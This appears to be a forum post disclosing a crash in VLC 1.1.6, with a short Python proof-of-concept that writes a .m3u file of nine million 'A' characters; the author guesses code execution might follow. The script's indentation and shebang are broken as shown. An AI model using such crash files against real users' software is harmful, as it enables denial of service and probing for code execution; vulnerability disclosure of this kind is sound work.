VLC 1.1.6 .m3u Overflow
There is an .m3u Overflow in the latest Version of the VLC media player. If you Open a .m3u file with 9000000 "A" characters the VLC will crash. There is maybe a shellcode execution possible.
POC:
#usr/bin/python
# Tested on Windows 7 32-bit German
# Older versions could be affected too
filename= "POC.m3u"
print "Creating file"
POC = "\x41" * 9000000
try:
exploitfile = open(filename, 'w')
exploitfile.write(POC)
exploitfile.close()
print "Exploit file created of size: " + str(len(POC))
except:
print "Something went wrong"
Merkur112
P.S: Sorry for the bad English, but I don't talk English.
Edited by Migration Bot